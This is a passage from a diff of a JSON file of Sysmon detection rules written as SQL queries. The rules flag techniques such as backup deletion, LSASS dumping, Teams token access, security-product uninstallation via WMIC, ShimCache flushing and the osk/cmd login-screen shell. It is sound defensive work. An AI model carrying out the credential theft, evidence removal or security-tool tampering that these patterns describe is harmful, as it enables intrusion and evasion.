FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR 